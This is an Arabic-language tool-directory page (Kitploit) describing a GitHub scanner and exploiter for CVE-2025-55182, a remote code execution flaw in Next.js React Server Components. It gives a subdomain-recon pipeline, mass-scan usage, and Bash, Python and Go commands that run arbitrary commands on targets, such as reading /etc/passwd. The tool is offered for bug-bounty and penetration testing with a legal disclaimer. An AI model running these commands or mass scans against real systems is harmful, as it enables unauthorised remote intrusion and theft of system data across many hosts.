Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Simple-Scanner — ماسح RCE عالي الدقة لثغرة CVE-2025-55182 التي تؤثر على Next.js RSC. يدعم الفحص الجماعي وتنفيذ الأوامر وخطوط الاستطلاع الآلية. مصمم لاختباري الاختراق والباحثين وصيادي المكافآت. | Kitploit
أدوات/GitHubGitHub/satriarizka/cve-2025-55182-simple-scanner
الاستطلاعماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
satriarizka/cve-2025-55182-simple-scanner

CVE-2025-55182-Simple-Scanner

ماسح RCE عالي الدقة لثغرة CVE-2025-55182 التي تؤثر على Next.js RSC. يدعم الفحص الجماعي وتنفيذ الأوامر وخطوط الاستطلاع الآلية. مصمم لاختباري الاختراق والباحثين وصيادي المكافآت.

عرض المستودع
4منذ 9 أشهرلم تتم المراجعة بعد

CVE-2025-55182: ماسح تنفيذ الأوامر عن بُعد في React Server Components

مجموعة أدوات شاملة لاكتشاف واستغلال CVE-2025-55182، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) في تطبيقات Next.js التي تستخدم React Server Components.

تتضمن هذه المستودعات ماسح Bash موحّد (وضع الهدف الفردي والوضع الجماعي)، وتنفيذات بلغة Python/Go، وسير عمل استطلاع لبرامج مكافآت الثغرات.

Scanner Menu Scanner Demo


📂 هيكل المستودع

  • scanner.sh — سكربت Bash متكامل للمسح على هدف فردي والمسح الجماعي
  • python/exploit.py — تنفيذ Python مستقر (تهريب JSON أفضل)
  • go/main.go — تنفيذ عالي الأداء (قابل للترجمة)

🚀 سير عمل الاستطلاع (منهجية مكافآت الثغرات)

للبحث الجماعي في النطاقات الفرعية، استخدم هذا الخط الأنبوبي لتصفية الأهداف قبل المسح:

root@kitploit:~
# 1. تعداد النطاقات الفرعية
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. تصفية المضيفات النشطة
httpx -l subs.txt -o live.txt

# 3. اكتشاف مسبق باستخدام Nuclei (اختياري)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ استخدام ماسح Bash (موصى به)

يدعم سكربت scanner.sh المسح على هدف فردي والمسح الجماعي من قائمة ملفات.

🔧 التثبيت

root@kitploit:~
chmod +x scanner.sh

1️⃣ وضع الهدف الفردي

الأفضل للتحقق من هدف محدد مع مخرجات تفصيلية.

root@kitploit:~
# فحص أساسي (الافتراضي هو "id")
./scanner.sh -d example.com

# تنفيذ أمر مخصص
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ وضع المسح الجماعي

يمسح قائمة من الروابط بكفاءة ويحفظ المضيفات المصابة في ملف.

root@kitploit:~
# مسح قائمة من الروابط
./scanner.sh -l live.txt -c "whoami"

# ملف مخرجات مخصص
./scanner.sh -l live.txt -o my_bounty.txt

الخيارات


🐍 نسخة Python

استخدمها إذا واجهت مشاكل في تهريب الأحرف الخاصة مع Bash.

المتطلبات

root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 نسخة Go

أداء عالٍ، وتبعيات قليلة.

التشغيل المباشر

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

بناء الملف التنفيذي

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ إخلاء مسؤولية

هذه الأداة لأغراض تعليمية ولاختبارات الأمان المصرّح بها فقط. الاستخدام غير المصرّح به غير قانوني تمامًا. المطور لا يتحمل أي مسؤولية عن إساءة الاستخدام أو الأضرار الناتجة عن هذا البرنامج.


🔗 المراجع

  • تفاصيل CVE من NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • نشرة React الأمنية (ثغرة React Server Components): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • قالب Nuclei من ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182

تنزيل الأداة
FlagDescription
-d, --domainرابط الهدف الفردي
-l, --listملف يحتوي على قائمة الروابط
-c, --commandالأمر المراد تنفيذه (الافتراضي: id)
-o, --outputملف المخرجات للمضيفات المصابة (الافتراضي: vulnerable_hosts.txt)